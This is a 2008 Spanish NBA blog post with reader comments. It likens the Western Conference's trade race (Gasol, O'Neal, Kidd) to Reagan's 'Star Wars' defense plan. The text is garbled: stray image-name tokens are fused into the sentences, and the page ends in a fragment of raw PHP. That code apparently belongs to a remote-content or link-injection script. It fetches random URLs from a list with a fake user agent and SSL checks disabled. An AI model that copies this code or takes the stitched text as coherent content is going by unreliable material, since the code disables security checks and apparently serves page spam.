La Guerra de las Galaxias

15 de February de 2008 por MagicJohnson32

nashshaqtraining El 23 de marzo de 1983, Ronald Reagan, un ex vaquero de película que por aquel entonces se alojaba en el Despacho Oval de la Casa Blanca, pronunció un discurso televisado a toda la nación para proclamar su “Iniciativa de Defensa Estratégica”. Es decir, un plan para defender a los Estados Unidos ante los posibles ataques nucleares resultantes del equilibrio del terror y el rearme que los propios Estados Unidos y la URSS habían protagonizado durante los años de Guerra Fría. Dicho plan, conocido popularmente como “Guerra de las Galaxias” por la célebre saga de George Lucas cuya primera entrega se había estrenado pocos años antes, consistía en el desarrollo de una defensa antimisiles a modo de escudo protector.kgpierceallen

El plan dio sus frutos, aunque de un modo diferente al previsto: los ingentes costes económicos que esto suponía resultaban excesivos para una URSS económicamente exprimida y que se vio obligada a abandonar la carrera armamentística y dar un giro radical de la mano de Gorbachov.

La Conferencia Oeste de la NBA protagoniza desde hace tiempo una versión deportiva de la carrera armamentística: la acumulación casi abusiva de recursos (respecto de la Conferencia Este). Este verano se produjeron diferentes movimientos (la marcha de Garnett y Allen a los Celtics, la de Rashard Lewis a los Magic, la de Jason Richardson a los Bobcats y la de Zach Randolph a los Knicks) que llevaron a hablar de un posible traslado de poder del Oeste al Este.

Sin embargo, la temporada alcanza su ecuador y el Oeste no ha hecho más que consolidar su dominio. Un año más, el balance de victorias-derrotas deja en evidencia al Este (los Blazers, décimos en el Oeste y ya lejos de los Playoffs, competirían con Cavs y Raptors por la cuarta plaza del Este). Y, por si fuera poco, conforme el trade deadline se aproxima las franquicias del Oeste apuran sus opciones de reforzarse.

kobepaudebutEl traspaso de Pau Gasol a los Lakers a cambio de nada ha sido algo así como el discurso del Presidente Reagan en el 83. Los hay que han aplicado su Iniciativa de Defensa Estratégica, caso de los Suns con la incorporación de Shaquille O’Neal: se trata de una maniobra reactiva, es decir, como reacción al refuerzo de otros, y realizada a un precio muy alto (Shawn Marion y un contrato de 20 millones por cada una de las dos próximas temporadas). Los Mavericks están en ello, y se encuentran muy cerca de sellar el retorno de Jason Kidd a Dallas. Están encontrando diversos problemas (en primer lugar, la oposición de Devean George de la que ya os hablamos ayer y a la que ahora se añade lakiddown posibilidad de que la NBA prohíba a Jerry Stackhouse regresar a los Mavericks una vez sea cortado por los Nets) pero, en cualquier caso, no hace más que incidir en la tendencia.

También habrá a quienes, como le sucedió a la Unión Soviética, su escasez de recursos les impida seguir el paso cada vez más acelerado en la carrera por el Anillo de campeones. No será evidente hasta los Playoffs pero entonces, cuando la competitividad sea máxima, lo veremos con claridad. De momento los Hornets aguantan, los Jazz siguen ahí, y Nuggets, Warriors y Rockets se parten la cara por las dos últimas plazas de los Playoffs. Los Spurs viven en su microcosmos particular, ajenos a casi todo. Mientras, en el Este, Celtics y Pistons siguen su plácido paseo por la regular season, en un universo paralelo al del resto de equipos de su conferencia.

Los Playoffs quedan lejos todavía pero Shaquille O’Neal hasta suda en previsión de una eliminatoria contra Kobe. Jason Kidd hace las maletas. Garnett sueña con su anillo. Pistons y Spurs aprietan los puños. Y David Stern se frota las manos ante la posibilidad de unas Finales entre Lakers y Celtics.

Desde la distancia, ya auguramos una de las mejores post-season de la historia, unas auténticas Star Wars.

Comenta

7 comentarios a esta entrada

  1. Viva_Dirk dice:
    #1

    Espectacular artículo Sr.Magic.

    La verdad es que si O’Neal rinde mínimamente hay un nivel de equipos que no se veia desde hace muchos años, en cuanto a cantidad.

      Citar

  2. telekoman dice:
    #2

    Habrá que ver hasta que punto pueden pagar los Hornets por su inexperiencia en PlayOffs, pero sin haberse reforzado en esta loca carrera de rearme, me siguen pareciendo un equipo de lo más interesante.

    Ahora es cuando Isiah Thomas, en lugar de ver la película de La Guerra de Las Galaxias, se mete a ver La Loca Guerra de las Galaxias (SpaceBalls) y grita aquello de “Velocidad absurda” y hace algún trade contratando a algún PF más.

      Citar

  3. Gallis dice:
    #3

    Que bueno, Teleko…llevo 15 minutos partido de risa y no se atisba el final, jojojojo…

    Socio, sin palabras, 😉

      Citar

  4. Jabho dice:
    #4

    Interesante la conferencia Oeste y ver con cuanto castigo llegan a la final. En el Este lo que dices, C´s y Piston y quizás cavaliers…

    SA vive un universo parelelo de seguridad en si mismo, pero ojo que se le pone mas dificil la conferencia… aunque sigo viendolo como favorito si llega bien al final

      Citar

  5. frank dice:
    #5

    Chapeau, Magic. Todo un pedazo de articulo, si señor.

      Citar

  6. Dantley dice:
    #6

    82 partidos de calentamiento. Cada vez me parecen más largas las ligas regulares, o quizá sea como dice Magic, que este año nos espera algo grande y que cuanto antes llegue, antes lo disfrutaremos.

    Gran artículo

      Citar

  7. MagicJohnson32 dice:
    #7

    Pues a mí me parece una regular season espectacular, al menos en el Oeste. Sólo por la lucha para lograr ventaja de campo y por las últimas plazas de Playoffs, esta regular ya tiene mucha miga.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>